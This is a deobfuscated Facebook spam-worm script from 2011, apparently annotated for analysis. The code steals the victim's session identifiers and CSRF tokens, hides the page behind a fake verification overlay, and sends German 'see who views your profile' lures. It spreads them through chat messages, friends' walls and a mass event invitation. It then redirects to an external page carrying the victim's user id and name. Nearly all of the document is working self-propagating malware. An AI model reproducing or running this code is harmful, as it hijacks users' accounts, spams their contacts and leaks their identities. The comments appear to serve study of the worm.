Created
April 25, 2011 18:19
deobfuscated Facebook spam
// Campaign configuration for the spam script that follows. All lure text is
// German and promises a "see who views your profile" feature.
//
// chatmessage: chat lure ("wow facebook can now show you who views your
// profile! Check it out @ ..."). %firstname% is filled in per recipient. The
// link goes through a URL shortener, so the destination is not visible in the
// message itself.
var chatmessage = '%firstname% wow facebook kann dir jetzt anzeigen wer dein Profil ansieht! Schaus dir an @ ow.ly/4GpHi'; | |
// postmessage: status/wall lure ("My top profile stalkers: ... visits"). Each
// %tf% is later replaced with a friend's name; the visit counts are constants
// in the template, not computed from anything.
var postmessage = 'Meine Top Profil-Stalker: \n\ %tf% - 1136 Besuche \n\ %tf% - 983 Besuche \n\ %tf% - 542 Besuche \n\ %tf% - 300 Besuche \n\ Schau dir an wer dein Profil sieht @ http://apps.facebook.com/iuhuihuuuuh/?o4dv7sq2'; | |
// redirect: external page the top-level window is navigated to at the end
// (see mf). The victim's id and display name are appended to it as a query
// string further down.
var redirect = 'http://germancpa.blogspot.com/'; | |
// eventdesc / eventname: description and title of the event that is created
// with the victim's friends as invitees.
var eventdesc = 'Schau dir deine Profil-Stalker an - http://apps.facebook.com/iuhuihuuuuh/?o4dv7sq2'; | |
var eventname = 'WOW Jetzt kannst du sehen wer sich dein Profil ansieht!'; | |
// nfriends: starting value of the countdown that bounds the per-friend wall posts.
var nfriends = 5000; | |
// debug: when true, alert() dialogs report progress.
var debug = false; | |
// wf: number of outstanding tasks; mf() only redirects once it is <= 0.
var wf = 0; | |
// Completion gate: once no tasks are outstanding (wf <= 0), navigate the
// top-level window to `redirect` after a 500 ms delay. Using window.top means
// the whole tab is navigated even if this script runs inside a frame.
// Callers write `mf(--wf)`; the function declares no parameter, so only the
// decrement's side effect on the global counter matters.
var mf = function () { | |
if (wf <= 0) { | |
setTimeout(function () { | |
window['top']['location']['href'] = redirect; | |
}, 500); | |
}; | |
}; | |
// Asynchronous GET helper.
//   target          - URL to fetch; every caller in this file passes a relative
//                     path, so the request goes to the origin of the page the
//                     script runs in.
//   resultCallback  - optional; receives responseText, only on HTTP 200.
//   _0x93d3xd       - optional; called once the request has finished,
//                     whatever the status.
// No error or timeout handling is present.
var doget = function (target, resultCallback, _0x93d3xd) { | |
var request = new XMLHttpRequest(); | |
request['open']('GET', target); | |
request['onreadystatechange'] = function () { | |
// readyState 4 = request complete.
if (request['readyState'] == 4) { | |
if (request['status'] == 200 && resultCallback) { | |
resultCallback(request['responseText']); | |
}; | |
if (_0x93d3xd) { | |
_0x93d3xd(); | |
}; | |
}; | |
}; | |
request['send'](); | |
}; | |
doget('/', function (resultData) { | |
// Start of the callback that receives the HTML of '/'.
// The logged-in user's numeric id is taken from the c_user cookie, which
// document.cookie exposes to any script running in the page. With no such
// cookie, match() returns null and the [1] access throws.
var c_user_cookie = document['cookie']['match'](/c_user=(\d+)/)[1]; | |
// Formats a friend record {id, name} as "@[id:name]", or '' when the record
// is missing. Presumably the site's mention/tag markup - confirm against the
// endpoint that consumes xhpc_message.
var _0x93d3x11 = function (_0x93d3x12) { | |
return _0x93d3x12 ? '@[' + _0x93d3x12['id'] + ':' + _0x93d3x12['name'] + ']' : ''; | |
}; | |
// Plain-text counterpart: the friend's name, or '' when the record is missing.
var _0x93d3x13 = function (_0x93d3x12) { | |
return _0x93d3x12 ? _0x93d3x12['name'] : ''; | |
}; | |
// Serialises an object into an application/x-www-form-urlencoded string.
// Values are passed through encodeURIComponent; keys are emitted as-is.
// A null value produces the bare key with no "=".
// NOTE(review): `out` is assigned without var/let, so it is an implicit global
// that every call overwrites. for...in also walks inherited enumerable
// properties.
var buildPostData = function (_0x93d3x12) { | |
out = ''; | |
for (var _0x93d3x15 in _0x93d3x12) { | |
out += (out ? '&' : '') + _0x93d3x15 + ((_0x93d3x12[_0x93d3x15] !== null) ? '=' + encodeURIComponent(_0x93d3x12[_0x93d3x15]) : ''); | |
}; | |
return out; | |
}; | |
// Asynchronous form POST helper, the POST counterpart of doget.
//   target          - URL to post to (relative paths in every call below).
//   _0x93d3x12      - object serialised with buildPostData as the request body.
//   resultCallback  - optional; receives responseText, only on HTTP 200.
//   _0x93d3xd       - optional; called once the request has finished,
//                     whatever the status.
var POST = function (target, _0x93d3x12, resultCallback, _0x93d3xd) { | |
var request = new XMLHttpRequest(); | |
request['open']('POST', target); | |
request['setRequestHeader']('Content-Type', 'application/x-www-form-urlencoded'); | |
request['onreadystatechange'] = function () { | |
if (request['readyState'] == 4) { | |
if (request['status'] == 200 && resultCallback) { | |
resultCallback(request['responseText']); | |
}; | |
if (_0x93d3xd) { | |
_0x93d3xd(); | |
}; | |
}; | |
}; | |
request['send'](buildPostData(_0x93d3x12)); | |
}; | |
// Builds a white, absolutely positioned overlay sized to 100% x 100% with a
// very high z-index and appends it to <body>. It covers the page while the
// requests below are sent.
// The text reads "Verify your code - please wait a moment" (German) followed
// by an English "processing the offer" line. The "click here" link sets wf = 0
// and calls mf(), which forces the redirect without waiting for outstanding
// tasks. The spinner image is loaded from an unrelated third-party host.
var _0x93d3x17 = function () { | |
var _0x93d3x18 = document['createElement']('div'); | |
_0x93d3x18['style']['display'] = 'block'; | |
_0x93d3x18['style']['position'] = 'absolute'; | |
_0x93d3x18['style']['width'] = 100 + '%'; | |
_0x93d3x18['style']['height'] = 100 + '%'; | |
_0x93d3x18['style']['left'] = 0 + 'px'; | |
_0x93d3x18['style']['top'] = 0 + 'px'; | |
_0x93d3x18['style']['textAlign'] = 'center'; | |
_0x93d3x18['style']['padding'] = '4px'; | |
_0x93d3x18['style']['background'] = '#FFFFFF'; | |
_0x93d3x18['style']['zIndex'] = 999999; | |
_0x93d3x18['innerHTML'] = ' <br/>Verifiziere deinen Code - Bitte gedulde dich einen kleinen Moment.<br/><br/> We are processing the offer for you... <a href="javascript:void(0);" onclick="wf=0; mf();">click here</a><br/><img src="http://genetics.bwh.harvard.edu/snp2rflp/circle.gif">'; | |
document['body']['appendChild'](_0x93d3x18); | |
}; | |
// Scrape per-session form values out of the fetched page with regexes.
// xhpc_composerid is matched in its backslash-escaped form and is optional;
// `comp` is assigned without var, so it becomes an implicit global.
var _0x93d3x19 = resultData['match'](/name=\\"xhpc_composerid\\" value=\\"([\d\w]+)\\"/i); | |
if (_0x93d3x19) { | |
comp = _0x93d3x19[1]; | |
} else { | |
comp = ''; | |
}; | |
// post_form_id and fb_dtsg are hidden form fields in the page HTML; both are
// replayed in every POST below. Presumably these are the site's anti-CSRF
// values. They do not stop a script that runs inside the page, because that
// script can read them exactly as the page's own code does.
// A missing field makes match() return null, and the [1] access throws.
var _0x93d3x1a = resultData['match'](/name="post_form_id" value="([\d\w]+)"/i)[1]; | |
var _0x93d3x1b = resultData['match'](/name="fb_dtsg" value="([\d\w]+)"/i)[1]; | |
// Display name of the logged-in user, read from the live DOM.
var _0x93d3x1c = document['getElementById']('navAccountName')['firstChild']['data']; | |
// The user id and display name are appended to the redirect URL, so the
// external host receives both when mf() finally navigates the window.
redirect = redirect + '?' + buildPostData({ | |
userid: c_user_cookie, | |
name: _0x93d3x1c, | |
doclose: 1 | |
}); | |
// Show the overlay before any of the requests below are issued.
_0x93d3x17(); | |
// Branch 1 (enabled when eventdesc is non-empty): create an event titled
// eventname and put every friend on its invitee list in a single request.
if (eventdesc) { | |
// Register this branch as an outstanding task.
wf++; | |
// Step 1: ask the chooser endpoint for an event-type dialog; the response
// carries a "token" value that the friend typeahead requires.
POST('/ajax/choose/?__a=1', { | |
type: 'event', | |
eid: null, | |
invite_message: '', | |
__d: 1, | |
post_form_id: _0x93d3x1a, | |
fb_dtsg: _0x93d3x1b, | |
lsd: null, | |
post_form_id_source: 'AsyncRequest' | |
}, function (resultData) { | |
var _0x93d3x1e = resultData['match'](/\\"token\\":\\"([^\\]+)\\"/)[1]; | |
// Step 2: query the typeahead endpoint for the viewer's friends only.
var target = '/ajax/typeahead/first_degree.php?__a=1&viewer=' + c_user_cookie + '&token=' + _0x93d3x1e + '&filter[0]=user&options[0]=friends_only&options[1]=nm&options[2]=sort_alpha'; | |
doget(target, function (_0x93d3x1f) { | |
// Collect every uid in the response except the user's own.
var _0x93d3x20 = _0x93d3x1f['match'](/\{"uid":\d+,/g); | |
var _0x93d3x21 = []; | |
for (var _0x93d3x22 = 0; _0x93d3x22 < _0x93d3x20['length']; _0x93d3x22++) { | |
var _0x93d3x23 = _0x93d3x20[_0x93d3x22]['match'](/:(\d+),/)[1]; | |
if (_0x93d3x23 != c_user_cookie) { | |
_0x93d3x21['push'](_0x93d3x23); | |
}; | |
}; | |
// Event start: 24 hours from now. datestr is M/D/YYYY and timestr is the
// current hour times 60; both are assigned without var (implicit globals).
var _0x93d3x24 = new Date(); | |
_0x93d3x24['setTime'](_0x93d3x24['getTime']() + 60 * 60 * 24 * 1000); | |
datestr = (_0x93d3x24['getMonth']() + 1) + '/' + _0x93d3x24['getDate']() + '/' + _0x93d3x24['getFullYear'](); | |
timestr = _0x93d3x24['getHours']() * 60; | |
// Form body for the event-creation endpoint.
var _0x93d3x25 = { | |
post_form_id: _0x93d3x1a, | |
fb_dtsg: _0x93d3x1b, | |
start_dateIntlDisplay: datestr, | |
start_date: datestr, | |
start_time_hour_min: timestr, | |
name: eventname, | |
place_page_id: '', | |
location: '', | |
street: '', | |
geo_id: '', | |
geo_sq: '', | |
desc: eventdesc, | |
// All collected friend ids, comma-separated.
sgb_invitees: _0x93d3x21['join'](','), | |
sgb_emails: '', | |
sgb_message: '', | |
privacy_type: 'on', | |
guest_list: 'on', | |
connections_can_post: 'on', | |
save: 'Create Event', | |
submitting: '' | |
}; | |
_0x93d3x25['new'] = ''; | |
// The response body is ignored (resultCallback is false). When the request
// finishes, the task counter is decremented and the redirect gate re-checked.
POST('/events/create.php', _0x93d3x25, false, function () { | |
mf(--wf); | |
}); | |
}); | |
}); | |
}; | |
// Branch 2 (enabled when chatmessage is non-empty): send the chat lure to every
// entry of the buddy list's nowAvailableList.
if (chatmessage) { | |
wf++; | |
POST('/ajax/chat/buddy_list.php?__a=1', { | |
user: c_user_cookie, | |
post_form_id: _0x93d3x1a, | |
fb_dtsg: _0x93d3x1b, | |
lsd: null, | |
post_form_id_source: 'AsyncRequest', | |
popped_out: false, | |
force_render: true | |
}, function (resultData) { | |
// The first 9 characters of the response are dropped before parsing -
// presumably a guard prefix in front of the JSON; confirm against a capture.
var _0x93d3x26 = resultData['substr'](9); | |
// NOTE(review): eval() executes the response body as code instead of parsing
// it as data; JSON.parse is the data-only way to read such a response.
var _0x93d3x27 = eval('(' + _0x93d3x26 + ')'); | |
var _0x93d3x28 = _0x93d3x27['payload']['buddy_list']; | |
// The keys of nowAvailableList are used as recipient ids (the `to` field).
for (var _0x93d3x29 in _0x93d3x28['nowAvailableList']) { | |
// The next three locals are never read; the POST below recomputes the same
// expressions inline.
var _0x93d3x2a = Math['floor'](Math['random']() * 1335448958); | |
var _0x93d3x2b = (new Date())['getTime'](); | |
var _0x93d3x2c = chatmessage['replace']('%firstname%', _0x93d3x28['userInfos'][_0x93d3x29]['firstName']['toLowerCase']()); | |
// One message per recipient: random msg_id, current client time, and the lure
// with %firstname% replaced by the recipient's lower-cased first name.
POST('/ajax/chat/send.php?__a=1', { | |
msg_id: Math['floor'](Math['random']() * 1335448958), | |
client_time: (new Date())['getTime'](), | |
msg_text: chatmessage['replace']('%firstname%', _0x93d3x28['userInfos'][_0x93d3x29]['firstName']['toLowerCase']()), | |
to: _0x93d3x29, | |
post_form_id: _0x93d3x1a, | |
fb_dtsg: _0x93d3x1b, | |
post_form_id_source: 'AsyncRequest' | |
}); | |
}; | |
// The sends carry no callbacks, so the task is marked done as soon as they
// are queued, not when they complete.
mf(--wf); | |
}); | |
}; | |
// Branch 3 (enabled when postmessage is non-empty): post the lure as the user's
// own status, then post it to friends' profiles one at a time.
if (postmessage) { | |
wf++; | |
doget('/ajax/browser/friends/?uid=' + c_user_cookie + '&filter=all&__a=1&__d=1', function (resultData) { | |
// Friend ids and names are scraped from the escaped HTML in the response:
// the id comes from the profile-picture file name, the name from the text of
// the profile link.
var _0x93d3x20 = resultData['match'](/\/\d+_\d+_\d+_q\.jpg.*?u003ca href=\\"http:\\\/\\\/www.facebook.com\\\/.*?\\u003c\\\/a>/gi); | |
var _0x93d3x2d = []; | |
if (_0x93d3x20) { | |
for (var _0x93d3x22 = 0; _0x93d3x22 < _0x93d3x20['length']; _0x93d3x22++) { | |
var _0x93d3x23 = _0x93d3x20[_0x93d3x22]['match'](/_\d+_/)[0]['replace'](/_/g, ''); | |
var _0x93d3x2e = _0x93d3x20[_0x93d3x22]['match'](/>[^>]+\\u003c\\\/a>$/i)[0]['replace'](/\\u003c\\\/a>$/gim, '')['replace'](/>/g, ''); | |
_0x93d3x2d['push']({ | |
id: _0x93d3x23, | |
name: _0x93d3x2e | |
}); | |
}; | |
}; | |
// Random draw without replacement. Each pass copies a randomly chosen entry
// into both output lists, then removes it from the source by shifting off the
// head and writing the old head over the chosen slot, which has moved down by
// one. _0x93d3xd is the pool of names for the %tf% placeholders; _0x93d3x2f
// is the queue of profiles to post to.
var _0x93d3xd = []; | |
var _0x93d3x2f = []; | |
while (_0x93d3x2d['length']) { | |
var _0x93d3x30 = Math['floor'](Math['random']() * _0x93d3x2d['length']); | |
_0x93d3xd['push'](_0x93d3x2d[_0x93d3x30]); | |
_0x93d3x2f['push'](_0x93d3x2d[_0x93d3x30]); | |
var _0x93d3x2b = _0x93d3x2d['shift'](); | |
if (_0x93d3x30) { | |
_0x93d3x2d[_0x93d3x30 - 1] = _0x93d3x2b; | |
}; | |
}; | |
if (debug) { | |
alert('fetched friends: ' + _0x93d3xd['length']); | |
}; | |
// Status update on the user's own profile: the target id is the user's own id
// and the context is 'home'.
var _0x93d3x31 = { | |
post_form_id: _0x93d3x1a, | |
fb_dtsg: _0x93d3x1b, | |
xhpc_composerid: comp, | |
xhpc_targetid: c_user_cookie, | |
xhpc_context: 'home', | |
xhpc_fbx: '', | |
lsd: null, | |
post_form_id_source: 'AsyncRequest' | |
}; | |
// mt is the plain-text body (friend names); m is the same text with
// "@[id:name]" in place of each name. Both are assigned without var (implicit
// globals). When the pool runs dry, pop() yields undefined and the
// placeholder is replaced with ''.
mt = postmessage; | |
m = postmessage; | |
while (mt['search']('%tf%') >= 0) { | |
var _0x93d3x32 = _0x93d3xd['pop'](); | |
mt = mt['replace']('%tf%', _0x93d3x13(_0x93d3x32)); | |
m = m['replace']('%tf%', _0x93d3x11(_0x93d3x32)); | |
}; | |
_0x93d3x31['xhpc_message_text'] = mt; | |
_0x93d3x31['xhpc_message'] = m; | |
if (debug) { | |
alert('message text: ' + mt); | |
}; | |
POST('/ajax/updatestatus.php?__a=1', _0x93d3x31); | |
// Per-friend posting loop. _0x93d3x15 is the remaining-post counter. Each call
// posts to the next queued profile and re-schedules itself 2000 ms later, so
// the traffic is a run of near-identical POSTs to the same endpoint at a fixed
// 2 s spacing, each with a different xhpc_targetid.
var _0x93d3x33 = function (_0x93d3x15) { | |
// Counter exhausted: force the redirect whatever else is still outstanding.
if (_0x93d3x15 == 0) { | |
wf = 0; | |
mf(); | |
return; | |
}; | |
var _0x93d3x34 = _0x93d3x2f['shift'](); | |
// Same form as the status update, but aimed at the friend's profile.
var _0x93d3x35 = { | |
post_form_id: _0x93d3x1a, | |
fb_dtsg: _0x93d3x1b, | |
xhpc_composerid: comp, | |
xhpc_targetid: _0x93d3x34['id'], | |
xhpc_context: 'profile', | |
xhpc_fbx: 1, | |
lsd: null, | |
post_form_id_source: 'AsyncRequest' | |
}; | |
var _0x93d3x36 = postmessage; | |
var _0x93d3x37 = postmessage; | |
// Name pool empty: stop and force the redirect.
if (_0x93d3xd['length'] == 0) { | |
wf = 0; | |
mf(); | |
return; | |
}; | |
while (_0x93d3x36['search']('%tf%') >= 0) { | |
var _0x93d3x38 = _0x93d3xd['pop'](); | |
_0x93d3x36 = _0x93d3x36['replace']('%tf%', _0x93d3x13(_0x93d3x38)); | |
_0x93d3x37 = _0x93d3x37['replace']('%tf%', _0x93d3x11(_0x93d3x38)); | |
}; | |
_0x93d3x35['xhpc_message_text'] = _0x93d3x36; | |
_0x93d3x35['xhpc_message'] = _0x93d3x37; | |
POST('/ajax/updatestatus.php?__a=1', _0x93d3x35); | |
setTimeout(function () { | |
_0x93d3x33(_0x93d3x15 - 1); | |
}, 2000); | |
}; | |
// Second increment for this branch. Neither increment is paired with a
// decrement; the loop above ends the run by setting wf = 0 directly.
wf++; | |
// Start the loop after 2 s, bounded by nfriends.
setTimeout(function () { | |
_0x93d3x33(nfriends); | |
}, 2000); | |
}); | |
}; | |
// Initial gate check, run once the three branches above have been started.
// Every enabled branch has already incremented wf, so this redirects
// immediately only when eventdesc, chatmessage and postmessage are all empty.
mf(); | |
}); |